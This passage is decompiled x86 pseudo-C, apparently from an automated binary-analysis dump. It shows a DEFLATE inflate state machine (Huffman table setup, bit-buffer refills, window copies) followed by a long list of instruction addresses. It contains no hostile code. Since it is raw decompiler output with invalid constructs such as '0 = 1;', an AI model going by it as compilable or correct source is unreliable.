												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x409340 + __eax * 2) & 0x0000ffff =  *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x409340 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x409340 + __eax * 2) & 0x0000ffff =  *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x42daf0;
												if( *0x42daf0 != 0) {
													L22:
													_t412 =  *0x409364; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x409368; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x42c96c; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x42c968; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x42c970;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x42cdf0;
													if(_t416 < 0x42cdf0) {
														L15:
														__eflags = _t416 - 0x42cbac;
														_t438 = 8;
														if(_t416 > 0x42cbac) {
															__eflags = _t416 - 0x42cd70;
															if(_t416 >= 0x42cd70) {
																__eflags = _t416 - 0x42cdd0;
																if(_t416 < 0x42cdd0) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E0040681A(0x42c970, 0x120, 0x101, 0x407388, 0x4073c8, 0x42c96c, 0x409364, 0x42d270, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x42c970, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x42c970 + _t440;
														E0040681A(0x42c970, 0x1e, 0, 0x407408, 0x407444, 0x42c968, 0x409368, 0x42d270, _t448 - 8);
														 *0x42daf0 =  *0x42daf0 + 1;
														__eflags =  *0x42daf0;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x10;
												if(__ebx >= 0x10) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E004055C3( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x409340 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x409340 + __eax * 2) & 0x0000ffff =  *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E0040681A( &(__esi[3]), __edi, 0x101, 0x407388, 0x4073c8, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E0040681A(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x407408, 0x407444, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}









                    0x00406043
                    0x00406043
                    0x00406043
                    0x00406043
                    0x00406043
                    0x00406047
                    0x00000000
                    0x00000000
                    0x0040604d
                    0x0040604d
                    0x00406050
                    0x00406053
                    0x00406058
                    0x0040605a
                    0x0040605d
                    0x00406060
                    0x00406063
                    0x00406063
                    0x00406066
                    0x00000000
                    0x00000000
                    0x00406068
                    0x00406068
                    0x0040606b
                    0x00406070
                    0x00406072
                    0x00406075
                    0x0040607b
                    0x00405dda
                    0x00405dda
                    0x00405ddd
                    0x00405de3
                    0x00405de9
                    0x00405df2
                    0x00405df8
                    0x00405dfb
                    0x00405e02
                    0x00405e07
                    0x00405e0d
                    0x00405e18
                    0x00405e18
                    0x00406081
                    0x00406081
                    0x0040608b
                    0x00000000
                    0x00000000
                    0x00406091
                    0x00406091
                    0x00406095
                    0x00406098
                    0x00406098
                    0x0040609c
                    0x004060a2
                    0x004060a2
                    0x004060a5
                    0x004060a8
                    0x004060ae
                    0x00000000
                    0x00000000
                    0x004060b0
                    0x004060d2
                    0x004060d2
                    0x004060d5
                    0x00000000
                    0x00000000
                    0x004060b2
                    0x004060b6
                    0x00000000
                    0x00000000
                    0x004060bc
                    0x004060bc
                    0x004060bf
                    0x004060c2
                    0x004060c7
                    0x004060c9
                    0x004060cc
                    0x004060cf
                    0x004060cf
                    0x004060d7
                    0x004060d7
                    0x004060dd
                    0x004060e0
                    0x004060e3
                    0x004060e3
                    0x004060ea
                    0x004060ee
                    0x004060f2
                    0x004060f5
                    0x004060f8
                    0x004060fe
                    0x00406103
                    0x00000000
                    0x00000000
                    0x00406105
                    0x00406119
                    0x00406119
                    0x0040611d
                    0x00000000
                    0x00000000
                    0x00406107
                    0x0040610a
                    0x0040610a
                    0x00406111
                    0x00406116
                    0x00406116
                    0x00406116
                    0x0040611f
                    0x0040611f
                    0x00406122
                    0x00406130
                    0x00406136
                    0x0040613b
                    0x00406141
                    0x00406147
                    0x0040614d
                    0x00406154
                    0x00406168
                    0x00406168
                    0x00406737
                    0x00406737
                    0x00406737
                    0x0040673c
                    0x00000000
                    0x00000000
                    0x00405d74
                    0x00405d74
                    0x00000000
                    0x0040636f
                    0x0040636f
                    0x00406373
                    0x00406376
                    0x00406379
                    0x0040637c
                    0x00000000
                    0x00000000
                    0x00406382
                    0x00406382
                    0x004063a7
                    0x004063a7
                    0x004063a7
                    0x004063a9
                    0x00000000
                    0x00000000
                    0x00406387
                    0x00406387
                    0x0040638b
                    0x00000000
                    0x00000000
                    0x00406391
                    0x00406391
                    0x00406394
                    0x00406397
                    0x0040639a
                    0x0040639c
                    0x0040639e
                    0x004063a1
                    0x004063a4
                    0x004063a4
                    0x004063a4
                    0x004063ab
                    0x004063ab
                    0x004063b3
                    0x004063b6
                    0x004063b9
                    0x004063bc
                    0x004063c0
                    0x004063c3
                    0x004063c5
                    0x004063c8
                    0x004063ca
                    0x004063de
                    0x004063de
                    0x004063e1
                    0x004063fb
                    0x004063fb
                    0x004063fe
                    0x00000000
                    0x00000000
                    0x00406404
                    0x00406404
                    0x00406407
                    0x00000000
                    0x00000000
                    0x0040640d
                    0x0040640d
                    0x00000000
                    0x0040640d
                    0x004063e3
                    0x004063e6
                    0x004063ed
                    0x004063f0
                    0x00000000
                    0x004063f0
                    0x004063cc
                    0x004063d0
                    0x004063d3
                    0x00000000
                    0x00000000
                    0x00406418
                    0x00406418
                    0x0040643d
                    0x0040643d
                    0x0040643d
                    0x0040643f
                    0x00000000
                    0x00000000
                    0x0040641d
                    0x0040641d
                    0x00406421
                    0x00000000
                    0x00000000
                    0x00406427
                    0x00406427
                    0x0040642a
                    0x0040642d
                    0x00406430
                    0x00406432
                    0x00406434
                    0x00406437
                    0x0040643a
                    0x0040643a
                    0x0040643a
                    0x00406441
                    0x00406449
                    0x0040644c
                    0x0040644f
                    0x00406451
                    0x00406454
                    0x00406454
                    0x00406456
                    0x0040645a
                    0x0040645d
                    0x00406460
                    0x00406463
                    0x00000000
                    0x00000000
                    0x00406469
                    0x00406469
                    0x0040648e
                    0x0040648e
                    0x0040648e
                    0x00406490
                    0x00000000
                    0x00000000
                    0x0040646e
                    0x0040646e
                    0x00406472
                    0x00000000
                    0x00000000
                    0x00406478
                    0x00406478
                    0x0040647b
                    0x0040647e
                    0x00406481
                    0x00406483
                    0x00406485
                    0x00406488
                    0x0040648b
                    0x0040648b
                    0x0040648b
                    0x00406492
                    0x00406492
                    0x0040649a
                    0x0040649d
                    0x004064a0
                    0x004064a3
                    0x004064a7
                    0x004064aa
                    0x004064ac
                    0x004064af
                    0x004064b2
                    0x004064cc
                    0x004064cc
                    0x004064cf
                    0x00000000
                    0x00000000
                    0x004064d5
                    0x004064d5
                    0x004064d8
                    0x004064df
                    0x00000000
                    0x004064df
                    0x004064b4
                    0x004064b7
                    0x004064be
                    0x004064c1
                    0x00000000
                    0x00000000
                    0x004064e7
                    0x004064e7
                    0x0040650c
                    0x0040650c
                    0x0040650c
                    0x0040650e
                    0x00000000
                    0x00000000
                    0x004064ec
                    0x004064ec
                    0x004064f0
                    0x00000000
                    0x00000000
                    0x004064f6
                    0x004064f6
                    0x004064f9
                    0x004064fc
                    0x004064ff
                    0x00406501
                    0x00406503
                    0x00406506
                    0x00406509
                    0x00406509
                    0x00406509
                    0x00406510
                    0x00406518
                    0x0040651b
                    0x0040651e
                    0x00406520
                    0x00406523
                    0x00406523
                    0x00406525
                    0x00000000
                    0x00000000
                    0x0040652b
                    0x0040652b
                    0x0040652e
                    0x00406533
                    0x00406535
                    0x0040653b
                    0x0040653d
                    0x00406552
                    0x00406554
                    0x00406554
                    0x0040653f
                    0x00406545
                    0x00406547
                    0x00406549
                    0x00406549
                    0x00406556
                    0x0040655a
                    0x0040655d
                    0x00406563
                    0x00406563
                    0x00406566
                    0x00406566
                    0x00406566
                    0x00406568
                    0x00000000
                    0x00000000
                    0x0040656e
                    0x0040656e
                    0x00406574
                    0x00406576
                    0x0040659b
                    0x0040659e
                    0x004065a4
                    0x004065a9
                    0x004065af
                    0x004065b5
                    0x004065b7
                    0x004065ba
                    0x004065c3
                    0x004065c9
                    0x004065c9
                    0x004065bc
                    0x004065be
                    0x004065c0
                    0x004065c0
                    0x004065cb
                    0x004065d1
